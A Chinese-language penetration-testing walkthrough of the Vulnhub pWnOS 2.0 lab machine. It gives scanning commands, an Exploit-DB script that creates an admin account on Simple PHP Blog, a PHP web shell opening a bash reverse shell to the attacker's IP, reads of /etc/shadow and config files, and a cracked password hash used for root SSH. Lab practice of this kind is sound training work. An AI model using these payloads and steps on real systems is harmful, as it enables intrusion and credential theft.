pWnOS2.0靶机渗透测试实战教程

环境准备

1. 网络配置：
   • 靶机IP: 10.10.10.100
   • 子网掩码: 255.255.255.0
   • 网关: 10.10.10.15
   • 攻击机IP: 10.10.10.20 (用于反弹shell)

信息收集阶段

1. Nmap扫描

主机存活判断:

nmap -sn 10.10.10.100

快速全端口扫描:

sudo nmap --min-rate 10000 -p- 10.10.10.100

• --min-rate 10000: 不低于10000包/秒的速度扫描
• -p-: 扫描所有端口(1-65535)

TCP服务扫描:

sudo nmap -sT -sV -O -p22,80 10.10.10.100

• -sT: TCP连接扫描
• -sV: 服务版本探测
• -O: 操作系统探测
• -p: 指定端口

UDP扫描:

sudo nmap -sU -p22,80 10.10.10.100 -oA report/heavy-U

• -sU: UDP扫描
• -oA: 输出所有格式报告到指定文件

漏洞扫描:

sudo nmap --script=vuln -p22,80 10.10.10.100

Web应用渗透

2. 目录扫描

sudo dirb http://10.10.10.100

发现/blog目录，通过F12查看源码确认CMS为Simple PHP Blog 0.4.0

3. CMS漏洞利用

搜索漏洞:

searchsploit "Simple PHP Blog 0.4.0"

下载利用脚本:

searchsploit -m 1191

解决依赖问题:

sudo apt-get install libswitch-perl

创建管理员账户:

sudo perl 1191.pl -h http://10.10.10.100/blog -e 3 -U ss -P 123456

• -h: 目标URL
• -e: 利用模式(3为创建用户)
• -U: 用户名
• -P: 密码

获取Shell

4. 上传Webshell

创建PHP反弹shell文件:

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.10.20/1234 0>&1'")?>

通过图片上传功能上传该文件，访问:

http://10.10.10.100/blog/images/shell.php

权限提升

5. 系统信息收集

基础信息:

uname -a
sudo -l

定时任务检查:

cat /etc/crontab
cat /etc/cron.d/*

Python稳定shell:

python -c 'import pty;pty.spawn("/bin/bash")'

6. 敏感信息查找

用户信息:

cat /etc/passwd
cat /etc/shadow

数据库凭证查找:

find / -name mysqli_connect.php 2>/dev/null
cat /var/www/mysqli_connect.php
cat /var/mysqli_connect.php

7. MySQL数据库利用

连接数据库:

mysql -u root -p

使用找到的凭证(root/root@ISIntS)

数据库操作:

show databases;
use ch16;
show tables;
select * from users;

发现SHA-1哈希: c2c4b4e51d9e23c02c15702c136c3e950ba9a4af

哈希破解:
使用在线工具破解得到明文密码: killerbeesareflying

8. 获取Root权限

使用找到的凭证通过SSH登录获取root权限:

ssh root@10.10.10.100

总结

1. 通过目录扫描发现Simple PHP Blog CMS
2. 利用已知漏洞创建管理员账户
3. 上传webshell获取初始访问
4. 查找数据库凭证并利用
5. 破解哈希获取最终root权限

参考资源

• 靶机下载链接: [Vulnhub pWnOS2.0]
• 漏洞利用脚本: Exploit-DB ID 1191
• 哈希破解工具: hash-identifier及在线破解平台